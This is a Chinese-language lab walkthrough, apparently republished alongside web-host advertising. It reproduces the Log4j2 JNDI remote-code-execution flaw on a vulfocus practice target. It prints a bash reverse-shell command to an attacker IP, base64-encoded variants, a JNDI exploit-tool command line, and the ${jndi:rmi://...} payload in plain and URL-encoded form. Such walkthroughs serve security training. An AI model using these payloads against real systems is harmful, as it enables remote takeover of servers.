vulfocus復(fù)現(xiàn):log4j2-rce-2021-12-09-創(chuàng)新互聯(lián)

文章目錄
  • 一、漏洞影響
  • 二、復(fù)現(xiàn)過程

創(chuàng)新互聯(lián)服務(wù)項(xiàng)目包括路橋網(wǎng)站建設(shè)、路橋網(wǎng)站制作、路橋網(wǎng)頁(yè)制作以及路橋網(wǎng)絡(luò)營(yíng)銷策劃等。多年來(lái),我們專注于互聯(lián)網(wǎng)行業(yè),利用自身積累的技術(shù)優(yōu)勢(shì)、行業(yè)經(jīng)驗(yàn)、深度合作伙伴關(guān)系等,向廣大中小型企業(yè)、政府機(jī)構(gòu)等提供互聯(lián)網(wǎng)行業(yè)的解決方案,路橋網(wǎng)站推廣取得了明顯的社會(huì)效益與經(jīng)濟(jì)效益。目前,我們服務(wù)的客戶以成都為中心已經(jīng)輻射到路橋省份的部分城市,未來(lái)相信會(huì)繼續(xù)擴(kuò)大服務(wù)區(qū)域并繼續(xù)獲得客戶的支持與信任!
一、漏洞影響

Apache Log4j 是一個(gè)基于Java的日志記錄工具。經(jīng)過多年的開發(fā)迭代,Log4j 1.x的維護(hù)已經(jīng)變得非常困難,因?yàn)樗枰c非常舊的 Java 版本兼容,所以于 2015 年 8 月正式升級(jí)為L(zhǎng)og4j2。黑客可以惡意構(gòu)造特殊數(shù)據(jù)請(qǐng)求包payload觸發(fā)漏洞,從而可以在目標(biāo)服務(wù)器上執(zhí)行任意代碼,導(dǎo)致服務(wù)器被控制。

受影響版本:2.0-beta9<= Apache Log4j<= 2.15.0-rc1

使用工具:
Base64在線編碼工具
url在線編碼工具
burpsuite
JNDI注入利用工具:JNDI-Injection-Exploit-1.0-SNAPSHOT-all.jar(生成JNDI鏈接并啟動(dòng)后端相關(guān)服務(wù),可用于Fastjson、Jackson等相關(guān)漏洞的驗(yàn)證)

GitHub - welk1n/JNDI-Injection-Exploit: JNDI注入測(cè)試工具(A tool which generates JNDI links can start several servers to exploit JNDI Injection vulnerability,like Jackson,Fastjson,etc)

二、復(fù)現(xiàn)過程

登錄網(wǎng)站https://vulfocus.cn/ ,打開這個(gè)鏡像vulfocus/log4j2-rce-2021-12-09
1.登錄
在這里插入圖片描述
2.在首頁(yè)啟動(dòng)靶場(chǎng)并訪問靶場(chǎng)地址
![在這里插入圖片描述](https://img-blog.csdnimg.cn/a15c0485ea92420f892ab291ebc560f6.png
在這里插入圖片描述3.點(diǎn)擊?????并抓包

vulfocus給我們提供的環(huán)境是/hello請(qǐng)求中傳遞的payload參數(shù),我們只需要嘗試在提交的payload參數(shù)中添加我們要插入的payload就好了
在這里插入圖片描述4.在攻擊機(jī)開啟監(jiān)聽
在這里插入圖片描述5.構(gòu)造執(zhí)行反彈shell命令的攻擊payload

攻擊命令:bash -i >& /dev/tcp/192.168.25.129/12345 0>&1 //根據(jù)實(shí)際情況修改對(duì)應(yīng)的IP、端口將要執(zhí)行的命令進(jìn)行base64編碼,可通過Java Runtime 配合 bash 編碼實(shí)現(xiàn)。反彈shell命令經(jīng)過base64編碼:

bash -c {echo,YmFzaCAtaSA+JiAvZGV2L3RjcC84MS43MC4xNTAuNi8xMjM0NSAwPiYx}|{base64,-d}|{bash,-i}

原因:由于Runtime執(zhí)行l(wèi)inux命令時(shí)管道符不生效,所以需要將命令進(jìn)行加密

在這里插入圖片描述本次復(fù)現(xiàn)在攻擊機(jī)使用JNDI注入利用工具(構(gòu)建ldap服務(wù))生成payload:
java -jar JNDI-Injection-Exploit-1.0-SNAPSHOT-all.jar -C “bash -c {echo,YmFzaCAtaSA+JiAvZGV2L3RjcC8xOTIuMTY4LjEwMS4xNDEvMTIzNDUgMD4mMQoK}|{base64,-d}|{bash,-i}” -A “192.168.101.141”

java -jar JNDI-Injection-Exploit-1.0-SNAPSHOT-all.jar -C "編碼后的bash反彈shell命令" -A “監(jiān)聽的IP地址”

![在這里插入圖片描述](https://img-blog.csdnimg.cn/3428a933d0c2491f86bcf90d45620c1d.png)


6.利用靶機(jī)地址去訪問攻擊機(jī)的JNDI服務(wù)
命令:payload=${jndi:生成的rmi}

將payload進(jìn)行url編碼:
payload=${jndi:rmi://81.70.150.6:1099/s8jz7d
![在這里插入圖片描述](https://img-blog.csdnimg.cn/efe085bbd6044cda8805a84dea7b6445.png)

發(fā)送payload
payload%3D%24%7Bjndi%3Armi%3A%2F%2F192.168.101.141%3A8090%2Fjnzm2a%7D
![在這里插入圖片描述](https://img-blog.csdnimg.cn/2648f662395f4060abc0e99cfeb2d8f4.png)

你是否還在尋找穩(wěn)定的海外服務(wù)器提供商?創(chuàng)新互聯(lián)www.cdcxhl.cn海外機(jī)房具備T級(jí)流量清洗系統(tǒng)配攻擊溯源,準(zhǔn)確流量調(diào)度確保服務(wù)器高可用性,企業(yè)級(jí)服務(wù)器適合批量采購(gòu),新人活動(dòng)首月15元起,快前往官網(wǎng)查看詳情吧

分享題目:vulfocus復(fù)現(xiàn):log4j2-rce-2021-12-09-創(chuàng)新互聯(lián)
鏈接地址:http://muchs.cn/article6/ceegog.html

成都網(wǎng)站建設(shè)公司_創(chuàng)新互聯(lián),為您提供自適應(yīng)網(wǎng)站、ChatGPT、面包屑導(dǎo)航定制網(wǎng)站、網(wǎng)站收錄、服務(wù)器托管

廣告

聲明:本網(wǎng)站發(fā)布的內(nèi)容(圖片、視頻和文字)以用戶投稿、用戶轉(zhuǎn)載內(nèi)容為主,如果涉及侵權(quán)請(qǐng)盡快告知,我們將會(huì)在第一時(shí)間刪除。文章觀點(diǎn)不代表本網(wǎng)站立場(chǎng),如需處理請(qǐng)聯(lián)系客服。電話:028-86922220;郵箱:631063699@qq.com。內(nèi)容未經(jīng)允許不得轉(zhuǎn)載,或轉(zhuǎn)載時(shí)需注明來(lái)源: 創(chuàng)新互聯(lián)

商城網(wǎng)站建設(shè)